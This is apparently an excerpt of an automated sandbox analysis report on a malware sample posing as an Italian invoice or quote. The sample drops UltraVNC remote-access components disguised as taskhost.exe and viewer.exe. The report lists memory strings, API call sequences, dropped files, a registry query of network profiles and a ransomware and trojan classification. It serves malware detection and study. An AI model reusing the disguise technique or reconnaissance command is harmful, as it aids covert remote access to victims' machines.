Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://tl.symcd.com0&
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.dr String found in binary or memory: http://www.pdf-tools.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: taskhost.exe.0.dr String found in binary or memory: https://forum.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: https://forum.uvnc.comvncMenu::WndProc
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://www.advancedinstaller.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://www.thawte.com/cps0/
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://www.thawte.com/repository0W
Source: taskhost.exe.0.dr String found in binary or memory: https://www.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: https://www.uvnc.comcmd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: https://www.uvnc.comhttps://forum.uvnc.comnet
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.cat

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Games\taskhost.exe Code function: 41_2_001154D0 SystemParametersInfoA,RegOpenKeyExA,RegSetValueExA,RegCloseKey, 41_2_001154D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0100AD30 NtdllDefWindowProc_W, 0_2_0100AD30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F773D0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W, 0_2_00F773D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F005B0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W, 0_2_00F005B0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E98520 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString, 0_2_00E98520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EAEA60 NtdllDefWindowProc_W, 0_2_00EAEA60
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E98BD0 NtdllDefWindowProc_W, 0_2_00E98BD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EA2CE0 NtdllDefWindowProc_W, 0_2_00EA2CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E9ADD0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow, 0_2_00E9ADD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EBCDD0 NtdllDefWindowProc_W, 0_2_00EBCDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EA2E50 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W, 0_2_00EA2E50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EA9070 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection, 0_2_00EA9070
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E9B5C0 NtdllDefWindowProc_W, 0_2_00E9B5C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F555C0 NtdllDefWindowProc_W, 0_2_00F555C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E9BC20 NtdllDefWindowProc_W, 0_2_00E9BC20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E97D50 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W, 0_2_00E97D50
Source: C:\Games\taskhost.exe Code function: 41_2_000CB8D0 wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProces 41_2_000CB8D0
Source: C:\Games\taskhost.exe Code function: wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProces 41_2_000CB8D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009A4836 0_3_009A4836
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009A4942 0_3_009A4942
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009700AC 0_3_009700AC
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_00970251 0_3_00970251
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01002440 0_2_01002440
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FE9080 0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E81490 0_2_00E81490
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EAF6F0 0_2_00EAF6F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FC5910 0_2_00FC5910
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FD7CE0 0_2_00FD7CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FD3C50 0_2_00FD3C50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0101C3F0 0_2_0101C3F0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01020210 0_2_01020210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EBE4E0 0_2_00EBE4E0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_010AC5E2 0_2_010AC5E2
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0109A7D0 0_2_0109A7D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EB6600 0_2_00EB6600
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EB2743 0_2_00EB2743
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_010A29F3 0_2_010A29F3
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01018800 0_2_01018800
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0106CA10 0_2_0106CA10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EC2BA0 0_2_00EC2BA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0102CA50 0_2_0102CA50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01092DEE 0_2_01092DEE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EB4E40 0_2_00EB4E40
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01020FB0 0_2_01020FB0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0100CED0 0_2_0100CED0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0109317C 0_2_0109317C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EAB090 0_2_00EAB090
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EAF180 0_2_00EAF180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EA3390 0_2_00EA3390
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E83480 0_2_00E83480
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01029470 0_2_01029470
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01073650 0_2_01073650
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EBF740 0_2_00EBF740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FC3750 0_2_00FC3750
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0101DA00 0_2_0101DA00
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F99B50 0_2_00F99B50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F03B10 0_2_00F03B10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E87AA0 0_2_00E87AA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0101FFD0 0_2_0101FFD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EAFF50 0_2_00EAFF50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0101DEF0 0_2_0101DEF0
Source: C:\Games\viewer.exe Code function: 6_2_006167A0 6_2_006167A0
Source: C:\Games\viewer.exe Code function: 6_2_00640040 6_2_00640040
Source: C:\Games\viewer.exe Code function: 6_2_0063E0E0 6_2_0063E0E0
Source: C:\Games\viewer.exe Code function: 6_2_00649151 6_2_00649151
Source: C:\Games\viewer.exe Code function: 6_2_0063B1CB 6_2_0063B1CB
Source: C:\Games\viewer.exe Code function: 6_2_0061C340 6_2_0061C340
Source: C:\Games\viewer.exe Code function: 6_2_0063B3FD 6_2_0063B3FD
Source: C:\Games\viewer.exe Code function: 6_2_006367B0 6_2_006367B0
Source: C:\Games\viewer.exe Code function: 6_2_00651804 6_2_00651804
Source: C:\Games\viewer.exe Code function: 6_2_006418B4 6_2_006418B4
Source: C:\Games\viewer.exe Code function: 6_2_00651924 6_2_00651924
Source: C:\Games\viewer.exe Code function: 6_2_0061DD00 6_2_0061DD00
Source: C:\Games\viewer.exe Code function: 6_2_0064FDE4 6_2_0064FDE4
Source: C:\Games\viewer.exe Code function: 6_2_00654EF0 6_2_00654EF0
Source: C:\Games\viewer.exe Code function: 6_2_0061FF00 6_2_0061FF00
Source: C:\Games\viewer.exe Code function: 6_2_00649F09 6_2_00649F09
Source: C:\Games\taskhost.exe Code function: 41_2_00162820 41_2_00162820
Source: C:\Games\taskhost.exe Code function: 41_2_0015F0D0 41_2_0015F0D0
Source: C:\Games\taskhost.exe Code function: 41_2_001DA974 41_2_001DA974
Source: C:\Games\taskhost.exe Code function: 41_2_000BD9F0 41_2_000BD9F0
Source: C:\Games\taskhost.exe Code function: 41_2_001E5A2B 41_2_001E5A2B
Source: C:\Games\taskhost.exe Code function: 41_2_0015FA50 41_2_0015FA50
Source: C:\Games\taskhost.exe Code function: 41_2_001C4362 41_2_001C4362
Source: C:\Games\taskhost.exe Code function: 41_2_001E23F9 41_2_001E23F9
Source: C:\Games\taskhost.exe Code function: 41_2_001CA650 41_2_001CA650
Source: C:\Games\taskhost.exe Code function: 41_2_000BD700 41_2_000BD700
Source: C:\Games\taskhost.exe Code function: 41_2_001C3FD4 41_2_001C3FD4
Source: C:\Games\viewer.exe Code function: String function: 00635126 appears 56 times
Source: C:\Games\viewer.exe Code function: String function: 00635630 appears 40 times
Source: C:\Games\viewer.exe Code function: String function: 006350F2 appears 93 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 00E8A880 appears 58 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 00E8AEE0 appears 67 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 00E887F0 appears 50 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 00E89320 appears 120 times
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: String function: 00EA5220 appears 35 times
Source: C:\Games\taskhost.exe Code function: String function: 000BCCB0 appears 34 times
Source: Preventivo24.01.11.exe Static PE information: invalid certificate
Source: taskhost.exe.0.dr Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskhost.exe.0.dr Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: Preventivo24.01.11.exe, 00000000.00000003.1685751474.0000000007E27000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewininet.dllD vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVNCHooks.dllH vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000000.1638029413.000000000120B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelzmaextractor.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePrereq.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685248284.0000000007E1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685666367.0000000007E1F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1685503614.0000000007E1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B101000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWinVNC.exe0 vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Section loaded: lpk.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: Preventivo24.01.11.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: shi6E82.tmp.0.dr Binary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
Source: timeout.exe, 00000036.00000002.2263167469.0000000000658000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .CMD;.VBP~
Source: classification engine Classification label: mal76.rans.troj.evad.winEXE@110/77@8/5
Source: ~.pdf.0.dr Initial sample: http://www.pdf-tools.com\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FC0AF0 FormatMessageW,GetLastError, 0_2_00FC0AF0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF4BE0 GetDiskFreeSpaceExW, 0_2_00FF4BE0
Source: C:\Games\viewer.exe Code function: 6_2_00613710 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle, 6_2_00613710
Source: C:\Games\viewer.exe Code function: 6_2_006149C0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error, 6_2_006149C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E8A740 LoadResource,LockResource,SizeofResource, 0_2_00E8A740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8624:120:WilError_03
